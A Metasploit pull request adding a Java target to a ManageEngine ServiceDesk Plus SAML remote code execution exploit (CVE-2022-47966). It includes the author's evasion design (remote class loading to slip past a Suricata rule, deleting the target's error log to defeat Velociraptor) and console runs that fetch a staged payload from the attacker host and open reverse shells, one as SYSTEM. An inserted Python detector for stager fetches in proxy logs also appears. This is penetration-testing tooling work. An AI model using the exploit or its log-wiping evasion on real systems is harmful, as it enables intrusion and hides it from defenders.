Add java target for ManageEngine ServiceDesk Plus CVE-2022-47966 #18515

Merged: 5 commits, Jan 4, 2024

Conversation

errorxyz (Contributor) commented Nov 5, 2023

Partially fixes: #17641

In this PR, I've added a java target for the ManageEngine ServiceDesk Plus exploit (CVE-2022-47966) using the payload mentioned in this blog post to make it more stealthy. It invokes javascript's javascript engine to execute arbitrary java. I've used the URLClassLoader class to load a remote payload hosted by Metasploit and bypass the Suricata rule mentioned in the blog post. The exploit uses java/shell_reverse_tcp as its payload since other payloads fail to work. Custom java payloads can be used to execute a particular function to bypass the Sigma rule. Before running the exploit, it deletes the log file that records the error due to the exploit in an attempt to bypass Velociraptor's detection.

Example Usage - ServiceDesk Plus version 14003 on Kali Linux - Target 0 ('java')

Link to set up the vulnerable software here

```
msf6 > use multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966
[*] Using configured payload java/shell_reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set rhosts 20.20.1.181
rhosts => 20.20.1.181
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set rport 8080
rport => 8080
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set srvport 8888
srvport => 8888
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set lhost eth0
lhost => 20.20.1.181
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 20.20.1.181:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://20.20.1.181:8888/iDG1ttxftK17p/
[*] Command shell session 55 opened (20.20.1.181:4444 -> 20.20.1.181:37934) at 2023-11-06 02:50:41 +0530
[*] Exploit completed. New session must be opened by now.
[*] Server stopped.

whoami
errorxyz
```

Once changes for this module are finalized, I'll make the corresponding changes for the other two modules using the same exploit.

@errorxyz errorxyz requested a review from sjanusz-r7 November 10, 2023 00:12
@bwatters-r7 bwatters-r7 self-assigned this Dec 5, 2023
errorxyz (Contributor, Author) commented:

@bwatters-r7 any updates?

bwatters-r7 (Contributor) commented:

Sorry; I was out for a bit on holiday. I grabbed this because I thought I could knock it out quickly, but my test install's SAML expired, so I need to go back and remember how to get that going. I have not forgotten about this.

errorxyz (Contributor, Author) commented Jan 4, 2024

Check out the documentation for the module that I've linked with the PR; it doesn't need you to have an active SAML.

bwatters-r7 (Contributor) commented:

```
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > show options

Module options (exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.167          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
                                              g-metasploit.html
   RPORT      8080                  yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (java/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java (in-memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://10.5.135.201:8080/7LHyPSLwpdaM9I/
[*] GET /7LHyPSLwpdaM9I/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /7LHyPSLwpdaM9I/metasploit.dat requested
[+] Sending 200
[*] GET /7LHyPSLwpdaM9I/metasploit.dat requested
[+] Sending the payload configuration data
[*] GET /7LHyPSLwpdaM9I/javapayload/stage/Shell.class requested
[+] Sending additional payload class: javapayload/stage/Shell.class
[*] GET /7LHyPSLwpdaM9I/javapayload/stage/Stage.class requested
[+] Sending additional payload class: javapayload/stage/Stage.class
[*] GET /7LHyPSLwpdaM9I/javapayload/stage/StreamForwarder.class requested
[+] Sending additional payload class: javapayload/stage/StreamForwarder.class
[*] Command shell session 2 opened (10.5.135.201:4444 -> 10.5.134.167:52626) at 2024-01-04 17:12:47 -0600
[*] Exploit completed.
[*] Server stopped.


Shell Banner:
Microsoft Windows [Version 10.0.17134.1]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\ManageEngine\ServiceDesk\bin>
-----


C:\Program Files\ManageEngine\ServiceDesk\bin>whoami
whoami
nt authority\system
```
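Seen from the defending side, the URLClassLoader staging described in the PR description leaves a recognisable shape in egress logs: the ServiceDesk host fetches metasploit/Payload.class, metasploit.dat and javapayload/stage/*.class from an attacker-chosen server under a random URI prefix, exactly as the module output above shows. The following is an added detection example, not code from this PR or from Metasploit; the one-request-per-line proxy log format, the sample lines and the function names are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Path tails the Java stager fetches, taken from the module output above.
# Only the tail is matched, so the random URIPATH prefix (e.g. /7LHyPSLwpdaM9I/)
# chosen per run does not matter.
STAGER_PATH_RE = re.compile(
    r"/(metasploit/Payload\.class|metasploit\.dat|javapayload/stage/[A-Za-z]+\.class)$"
)

# Assumed (constructed) proxy log format: "<client_ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")

# Constructed sample log: one staging sequence plus benign traffic, including a
# harmless .class download that must not trigger.
SAMPLE_LOG = """\
10.5.134.167 GET http://10.5.135.201:8080/7LHyPSLwpdaM9I/metasploit/Payload.class 200
10.5.134.167 HEAD http://10.5.135.201:8080/7LHyPSLwpdaM9I/metasploit.dat 200
10.5.134.167 GET http://10.5.135.201:8080/7LHyPSLwpdaM9I/metasploit.dat 200
10.5.134.167 GET http://10.5.135.201:8080/7LHyPSLwpdaM9I/javapayload/stage/Shell.class 200
10.5.134.10 GET http://updates.example.com/catalog/index.html 200
10.5.134.10 GET http://cdn.example.com/lib/Util.class 200
"""


def stager_fetches(log_text):
    """Return {client_ip: [(method, remote_host, path), ...]} for requests whose
    path tail matches the Java stager file layout."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparsable line: skip rather than crash on real-world noise
        parts = urlsplit(m.group("url"))
        if STAGER_PATH_RE.search(parts.path):
            hits[m.group("client")].append((m.group("method"), parts.hostname, parts.path))
    return dict(hits)


def flag_clients(log_text, min_hits=2):
    """A single matching request could be a scanner probing our proxy; require
    min_hits distinct stager files from the same client before alerting."""
    return {client: reqs for client, reqs in stager_fetches(log_text).items()
            if len({path for _, _, path in reqs}) >= min_hits}
```

Feeding the same logic a host-level log from the ServiceDesk server (the client address is then the Java process itself) gives the host-side view of the same stage download.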

@bwatters-r7 bwatters-r7 merged commit cdfa421 into rapid7:master Jan 4, 2024
32 checks passed
@bwatters-r7 bwatters-r7 added the rn-enhancement release notes enhancement label Jan 4, 2024
bwatters-r7 (Contributor) commented:

Release Notes

This PR adds a java target for the ManageEngine ServiceDesk Plus exploit CVE-2022-47966 using the payload mentioned in this blog post and deletes the log file that records the error due to the exploit to make it more stealthy.

Successfully merging this pull request may close these issues.

Change ManageEngine CVE-2022-47966 to be more stealthy